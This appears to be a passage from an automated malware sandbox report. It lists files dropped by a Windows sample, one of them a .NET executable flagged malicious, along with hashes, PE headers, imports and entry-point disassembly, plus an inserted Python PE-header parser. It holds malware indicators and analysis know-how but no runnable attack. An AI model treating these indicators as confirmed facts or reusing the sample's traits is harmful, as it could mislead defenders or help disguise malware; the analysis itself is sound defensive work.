                                                          Entropy (8bit):5.259604942685469
                                                          Encrypted:false
                                                          SSDEEP:3072:YlXc8ISCQhQzh6OVoWlq5OiUG5QivXsP1zpKHDkO7UN2ET:yUSbSzh6OzgOiUOvrU0
                                                          MD5:BCB323EB0CFD10D58CF134BC7BDC8D67
                                                          SHA1:C34A8C428B715B67B696819FC1D172708A23D3F3
                                                          SHA-256:6D1A5864D641F2DA852BFCED96A305A41B6464DC12A944883985A4C305A9D8C3
                                                          SHA-512:BAC5411C794A1B473B628C5B261BEF5A830A6FED5A797C785AC3F3370DEF8F91DB2368DB8EA13D91ECE0B89AB6109B64E3ECDDCD27D15B2D7CC6F29216A57255
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E(.g.........."...0..............M... ...`....@.. .......................@......J~....`..................................L..S....`....................... ....................................................... ............... ..H............text...4-... ...................... ..`.rsrc........`.......0..............@..@.reloc....... ......................@..B.................M......H............p......[...................................................PK......................................PK......PK......PK......PK....{....*..{....*V.(......}......}....*. .s.. )UU.Z( ....{....o$...X )UU.Z("....{....o%...X*..{(...*..{)...*V.(......}(.....})...*. (... )UU.Z( ....{(...o$...X )UU.Z("....{)...o%...X*..{*...*..{+...*V.(......}*.....}+...*. .<f. )UU.Z( ....{*...o$...X )UU.Z("....{+...o%...X*..{,...*..{-...*V.(......},.....}-...*. .Pl. )UU.Z( ....{,...o$...X
                                                          Process:C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1498
                                                          Entropy (8bit):5.364175471524945
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhBsXE4NpOKIE4TKBGKoC1qE4GIsGAE4KKUN8E4KD:MxHKQwYHKGSI6okHNpOtHTHK1qHGIsGX
                                                          MD5:50F486DF837CEA053D0408A8A59A67C7
                                                          SHA1:369DDB14668BEF8A2D08428B78E6A9BAEBE0FFA2
                                                          SHA-256:8D5B805F47B9638841BB8B45839CD0977CEC5C39593F0BBA62CA5D68241B7B70
                                                          SHA-512:73B4DD94A0F8D1D81B5776C7A742DD9DF39B33F9B2ABE516EEAAEFB24F7521117C3702E3BEF7E9A55D8C7BB7F8718AA07FBE5B96B87C9AE22B3075B6644935A5
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_6
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19253
                                                          Entropy (8bit):5.005546805196593
                                                          Encrypted:false
                                                          SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeho+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiho+OdBANZD
                                                          MD5:F6D5AAADB944E11B39EF4722CC9A3547
                                                          SHA1:4899D19668B0BC084059BA568A8E1F3DE2964D37
                                                          SHA-256:D2F8DE3B410C036BEE14DEA64D6C4C46F78B0C1D607704074988BB161C910F61
                                                          SHA-512:EF6C70F8EF5ED80A580D17567C2F7970C9F34ED2ECF4C00CBE2975596D8DF6FC4CE1BB3EE9D03B5FCFC5B2506751F581B702E1C60381A5A29D8A113EC2557EE1
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllulbnolz:NllUc
                                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                          Malicious:false
                                                          Preview:@...e................................................@..........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):252416
                                                          Entropy (8bit):5.259604942685469
                                                          Encrypted:false
                                                          SSDEEP:3072:YlXc8ISCQhQzh6OVoWlq5OiUG5QivXsP1zpKHDkO7UN2ET:yUSbSzh6OzgOiUOvrU0
                                                          MD5:BCB323EB0CFD10D58CF134BC7BDC8D67
                                                          SHA1:C34A8C428B715B67B696819FC1D172708A23D3F3
                                                          SHA-256:6D1A5864D641F2DA852BFCED96A305A41B6464DC12A944883985A4C305A9D8C3
                                                          SHA-512:BAC5411C794A1B473B628C5B261BEF5A830A6FED5A797C785AC3F3370DEF8F91DB2368DB8EA13D91ECE0B89AB6109B64E3ECDDCD27D15B2D7CC6F29216A57255
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E(.g.........."...0..............M... ...`....@.. .......................@......J~....`..................................L..S....`....................... ....................................................... ............... ..H............text...4-... ...................... ..`.rsrc........`.......0..............@..@.reloc....... ......................@..B.................M......H............p......[...................................................PK......................................PK......PK......PK......PK....{....*..{....*V.(......}......}....*. .s.. )UU.Z( ....{....o$...X )UU.Z("....{....o%...X*..{(...*..{)...*V.(......}(.....})...*. (... )UU.Z( ....{(...o$...X )UU.Z("....{)...o%...X*..{*...*..{+...*V.(......}*.....}+...*. .<f. )UU.Z( ....{*...o$...X )UU.Z("....{+...o%...X*..{,...*..{-...*V.(......},.....}-...*. .Pl. )UU.Z( ....{,...o$...X
                                                          File type:PE32+ executable (console) x86-64, for MS Windows
                                                          Entropy (8bit):6.254511736164471
                                                          TrID:
                                                          • Win64 Executable Console (202006/5) 92.65%
                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                          • DOS Executable Generic (2002/1) 0.92%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:DBp7mBJwqD.exe
                                                          File size:14'848'000 bytes
                                                          MD5:c5d36c7404a03ec6df8024737d97a0c8
                                                          SHA1:9a213e487337376c38e0cfdac240dc6ffb5fdc1e
                                                          SHA256:86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354
                                                          SHA512:812a21f479c56716d892df32a1f910b41310f74de13641d93654a0a722705fb90e114081f2af2ef8c4717febb05715183c0d6deb36bb135f819553c9a9e49216
                                                          SSDEEP:196608:MUehdkSzJ4bvuLE5rUSW9rWWsPbWIBMWRlHbLVb4zH:M94x5r1CrWWsTWIfN8
                                                          TLSH:7EE68D52E7CE10E1C55B807C499BC672FA3EB44587304FEB85498B72DE23AA4973B385
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........qQ.."Q.."Q.."X.2"C.."A..#S.."A..#U.."A..#[.."A.\"P.."H..#}.."#..#P.."#..#@.."Q.."c.."A..#E.."Q.."P.."...#P.."...#P.."RichQ..
                                                          Icon Hash:90cececece8e8eb0
                                                          Entrypoint:0x14071690c
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x140000000
                                                          Subsystem:windows cui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x672879C1 [Mon Nov 4 07:37:37 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:a0f58d96494ecd8101f0c759318da60c
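The header fields listed above (entry point, image base, subsystem, DLL characteristics, link timestamp, data directories) and the per-section values further down can be read straight from the file with a few struct calls. The following is an added example, not Joe Sandbox code and not code from the sample: it parses a PE32+ header, decodes the DllCharacteristics bits into the same names the report uses, converts the timestamp to UTC, maps an RVA to its section (the report's "Is in Section" column) and computes the 8-bit Shannon entropy the report shows per file and section. The image it runs on is constructed in build_sample_image(); its header values mirror the flags of the analysed file, but its body is synthetic and it is not the analysed sample.

```python
"""PE32+ header reader for the static fields a sandbox report lists.

Added example, not Joe Sandbox code. The image parsed in __main__ is
constructed below and is not the analysed sample.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH",
    0x0800: "NO_BIND", 0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
DIRECTORIES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY",
               "BASERELOC", "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS",
               "LOAD_CONFIG", "BOUND_IMPORT", "IAT", "DELAY_IMPORT",
               "COM_DESCRIPTOR", "RESERVED"]
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for empty or constant data)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def parse_pe(image: bytes) -> dict:
    """Parse DOS header, NT headers and section table of a PE32+ image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, ..., SizeOfOptionalHeader, Characteristics
    machine, nsec, tstamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", image, opt)[0] != 0x20B:
        raise ValueError("not a PE32+ optional header")
    (entry_rva,) = struct.unpack_from("<I", image, opt + 16)       # AddressOfEntryPoint
    (image_base,) = struct.unpack_from("<Q", image, opt + 24)      # ImageBase (8 bytes in PE32+)
    subsystem, dll_chars = struct.unpack_from("<HH", image, opt + 68)
    (ndirs,) = struct.unpack_from("<I", image, opt + 108)          # NumberOfRvaAndSizes
    dirs = {}
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", image, opt + 112 + 8 * i)
        if rva or size:
            dirs[DIRECTORIES[i]] = (rva, size)
    sections = []
    for i in range(nsec):  # section headers follow the optional header, 40 bytes each
        name, vsize, va, rsize, rptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", image, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "rsize": rsize, "flags": flags,
                         "entropy": round(entropy(image[rptr:rptr + rsize]), 3)})
    return {
        "machine": machine,
        "timestamp": datetime.fromtimestamp(tstamp, tz=timezone.utc),
        "image_base": image_base,
        "entrypoint": image_base + entry_rva,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "directories": dirs,
        "sections": sections,
    }


def section_for_rva(pe: dict, rva: int):
    """Name of the section containing rva (the report's 'Is in Section'), or None."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rsize"]):
            return s["name"]
    return None


def entrypoint_is_executable(pe: dict) -> bool:
    """True when the entry point lies in a section flagged IMAGE_SCN_MEM_EXECUTE."""
    name = section_for_rva(pe, pe["entrypoint"] - pe["image_base"])
    return any(s["name"] == name and s["flags"] & IMAGE_SCN_MEM_EXECUTE for s in pe["sections"])


def build_sample_image() -> bytes:
    """Constructed PE32+ console image with one .text section (not the analysed sample).
    Header values mirror the report: image base 0x140000000, subsystem cui,
    DllCharacteristics HIGH_ENTROPY_VA|DYNAMIC_BASE|NX_COMPAT|TERMINAL_SERVER_AWARE."""
    # sub rsp,28h ; call rel32 ; add rsp,28h ; jmp rel32 ; int3 ; int3
    code = bytes.fromhex("4883EC28E8C79E00004883C428E93E000000CCCC")
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x8664, 1, 0x672879C1, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                            # PE32+ magic
    struct.pack_into("<I", opt, 16, 0x1000)                          # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, 0x140000000)                     # ImageBase
    struct.pack_into("<HH", opt, 68, 3, 0x8160)                      # Subsystem, DllCharacteristics
    struct.pack_into("<I", opt, 108, 16)                             # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * 6, 0x1010, 0x1C)          # DEBUG directory inside .text
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, len(code), 0x200,
                      0, 0, 0, 0, 0x60000020)                        # CNT_CODE|MEM_EXECUTE|MEM_READ
    hdr = dos + b"PE\0\0" + file_hdr + bytes(opt) + sec
    return hdr + bytes(0x200 - len(hdr)) + code


if __name__ == "__main__":
    pe = parse_pe(build_sample_image())
    for key, value in pe.items():
        print(f"{key}: {value}")
    print("entry point in executable section:", entrypoint_is_executable(pe))
```

On a real file call parse_pe(open(path, "rb").read()). The entry-point check is the first sanity test to run on a sample whose headers look unusual: an entry RVA that falls outside every section flagged IMAGE_SCN_MEM_EXECUTE points to a tampered or packed header, and a section entropy near 8.0 points to packed or encrypted content.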
Instruction (note: the listing decodes the 64-bit entry point as 32-bit code, so every "dec"/"inc" of a register below is really a REX prefix byte 0x40-0x4F and "arpl" stands for "movsxd"; read "dec eax / sub esp, 28h" as "sub rsp, 28h")
                                                          dec eax
                                                          sub esp, 28h
                                                          call 00007FC154B99ED0h
                                                          dec eax
                                                          add esp, 28h
                                                          jmp 00007FC154B99747h
                                                          int3
                                                          int3
                                                          dec eax
                                                          sub esp, 28h
                                                          dec ebp
                                                          mov eax, dword ptr [ecx+38h]
                                                          dec eax
                                                          mov ecx, edx
                                                          dec ecx
                                                          mov edx, ecx
                                                          call 00007FC154B998E2h
                                                          mov eax, 00000001h
                                                          dec eax
                                                          add esp, 28h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          inc eax
                                                          push ebx
                                                          inc ebp
                                                          mov ebx, dword ptr [eax]
                                                          dec eax
                                                          mov ebx, edx
                                                          inc ecx
                                                          and ebx, FFFFFFF8h
                                                          dec esp
                                                          mov ecx, ecx
                                                          inc ecx
                                                          test byte ptr [eax], 00000004h
                                                          dec esp
                                                          mov edx, ecx
                                                          je 00007FC154B998E5h
                                                          inc ecx
                                                          mov eax, dword ptr [eax+08h]
                                                          dec ebp
                                                          arpl word ptr [eax+04h], dx
                                                          neg eax
                                                          dec esp
                                                          add edx, ecx
                                                          dec eax
                                                          arpl ax, cx
                                                          dec esp
                                                          and edx, ecx
                                                          dec ecx
                                                          arpl bx, ax
                                                          dec edx
                                                          mov edx, dword ptr [eax+edx]
                                                          dec eax
                                                          mov eax, dword ptr [ebx+10h]
                                                          mov ecx, dword ptr [eax+08h]
                                                          dec eax
                                                          mov eax, dword ptr [ebx+08h]
                                                          test byte ptr [ecx+eax+03h], 0000000Fh
                                                          je 00007FC154B998DDh
                                                          movzx eax, byte ptr [ecx+eax+03h]
                                                          and eax, FFFFFFF0h
                                                          dec esp
                                                          add ecx, eax
                                                          dec esp
                                                          xor ecx, edx
                                                          dec ecx
                                                          mov ecx, ecx
                                                          pop ebx
                                                          jmp 00007FC154B998EAh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          nop word ptr [eax+eax+00000000h]
                                                          dec eax
                                                          cmp ecx, dword ptr [0000B0C9h]
                                                          jne 00007FC154B998E2h
                                                          dec eax
                                                          rol ecx, 10h
                                                          test cx, FFFFh
                                                          jne 00007FC154B998D3h
                                                          ret
                                                          dec eax
                                                          ror ecx, 10h
                                                          jmp 00007FC154B9990Bh
                                                          int3
                                                          int3
                                                          inc eax
                                                          push ebx
                                                          dec eax
Programming Language:
• [IMP] VS2008 SP1 build 30729

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x71dc80         0x6f0         .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x71e370         0x154         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x723000         0x9e4         .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xe1f000         0xa130        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x71d150         0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x71d010         0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x718000         0x630         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text     0x1000           0x71680c      0x717000  8e91aafa86e16efcb8fc6dd2bdf79c07  unknown   unknown              unknown    unknown             IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata    0x718000         0x799c        0x8000    690b5f309cbde25ff7bef4c9e17d54b8  False     0.4840087890625      data       5.763993267407936   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data     0x720000         0x2520        0x2000    2fd304a398b0b63c2976d61915182dfa  False     0.27587890625        data       3.8753769253495967  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata    0x723000         0x9e4         0x1000    7caf23b65919fce254c79a58f85024d1  False     0.325439453125       data       3.7131375757505425  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rodata   0x724000         0xa360        0xb000    ae0f63af4570c7fe645dd589fbb0d10b  False     0.3878506747159091   data       4.465858318841145   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.svm_hea  0x72f000         0x6f0000      0x6f0000  07179480af9ebc41b24e52a193fa769c  unknown   unknown              unknown    unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc    0xe1f000         0xa130        0xb000    3ceee33c6dea8e5bfca1fef965bf1e93  False     0.11656605113636363  data       5.319384389908146   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL: Import
VERSION.dll: VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
ADVAPI32.dll: RegCloseKey, RegEnumKeyExA, GetUserNameW, OpenProcessToken, RegOpenKeyExA, RegOpenKeyExW, RegQueryInfoKeyA, RegQueryValueExA, RegQueryValueExW
WS2_32.dll: closesocket, getaddrinfo, freeaddrinfo, socket, ntohl, WSAStartup, gethostname
USERENV.dll: GetUserProfileDirectoryW
KERNEL32.dll: WaitForSingleObject, WakeAllConditionVariable, WriteFile, GetTimeZoneInformation, GetDynamicTimeZoneInformation, MultiByteToWideChar, GetLocaleInfoA, GetGeoInfoA, GetUserGeoID, GetUserDefaultLCID, SetLastError, SetHandleInformation, GetFileSizeEx, ReadFile, SetFilePointerEx, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, GetFileAttributesW, GetFileAttributesExW, GetFileInformationByHandle, GetFullPathNameW, GlobalMemoryStatusEx, DeviceIoControl, FormatMessageW, VirtualQuery, GetEnvironmentStrings, GetEnvironmentStringsW, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WaitForMultipleObjects, GetProcessTimes, GetCurrentProcessId, TerminateProcess, GetExitCodeProcess, OpenProcess, GetHandleInformation, CreatePipe, CreateProcessW, GetProcessId, WideCharToMultiByte, GetConsoleWindow, GetFileType, PeekNamedPipe, GetNumberOfConsoleInputEvents, PeekConsoleInputA, GetSystemTimeAsFileTime, GetProcessAffinityMask, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, GetModuleHandleW, GetWindowsDirectoryW, GetVersionExA, GetTempPathW, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameW, GetLastError, GetCurrentThreadId, GetCurrentThread, VirtualProtect, VirtualFree, VirtualAlloc, UnmapViewOfFile, SwitchToThread, SleepConditionVariableCS, Sleep, SetEvent, ResetEvent, QueryPerformanceFrequency, QueryPerformanceCounter, GetCurrentProcess, GetCurrentDirectoryW, FlushFileBuffers, EnterCriticalSection, DuplicateHandle, CreateFileW, CreateFileMappingW, CreateEventA, CloseHandle, AddVectoredContinueHandler, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GetModuleHandleExW, InitializeConditionVariable
VCRUNTIME140.dll: memcpy, __current_exception, wcschr, __C_specific_handler, memset, __current_exception_context
api-ms-win-crt-runtime-l1-1-0.dll: _exit, _set_app_type, exit, terminate, _register_onexit_function, _initialize_onexit_table, _seh_filter_exe, _errno, _register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___argv, __p___argc, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _beginthreadex, _crt_atexit
api-ms-win-crt-string-l1-1-0.dll: strcmp, wcscpy, isdigit, wcscmp, iswctype, strcpy, _strdup, wcsncat, towupper, wcsncmp, wcslen, _wcsupr, strlen, wcscat
api-ms-win-crt-environment-l1-1-0.dll: _wgetdcwd, _wgetenv, _wgetcwd
api-ms-win-crt-heap-l1-1-0.dll: malloc, free, _set_new_mode, calloc
api-ms-win-crt-convert-l1-1-0.dll: wcstombs, strtoull
api-ms-win-crt-stdio-l1-1-0.dll: _set_fmode, __acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vsprintf, fputs, __stdio_common_vswprintf, __p__commode
api-ms-win-crt-filesystem-l1-1-0.dll: _wfullpath
api-ms-win-crt-math-l1-1-0.dll: __setusermatherr
api-ms-win-crt-locale-l1-1-0.dll: _configthreadlocale
IPHLPAPI.DLL: ConvertLengthToIpv4Mask, ConvertInterfaceLuidToNameW, ConvertInterfaceNameToLuidW, GetIfEntry2, GetUnicastIpAddressTable, GetAnycastIpAddressTable, FreeMibTable
Ordinal  Address      Name
1        0x140031510  IsolateEnterStub__CEntryPointNativeFunctions__attachThread__LWiahz8fydJWgxqffuaEC2
2        0x1400316d0  IsolateEnterStub__CEntryPointNativeFunctions__createIsolate__aVxZJEvxfd8FslyQXMlHNI
3        0x1400319d0  IsolateEnterStub__CEntryPointNativeFunctions__detachAllThreadsAndTearDownIsolate__OPBluFOA7k6a9G1cqb6TTL
4        0x140031c20  IsolateEnterStub__CEntryPointNativeFunctions__detachThread__vZogK8TBGAIeNIWWaZu2QH
5        0x140031e90  IsolateEnterStub__CEntryPointNativeFunctions__getCurrentThread__p19YkdKU3I3cgUmQuiiTd0
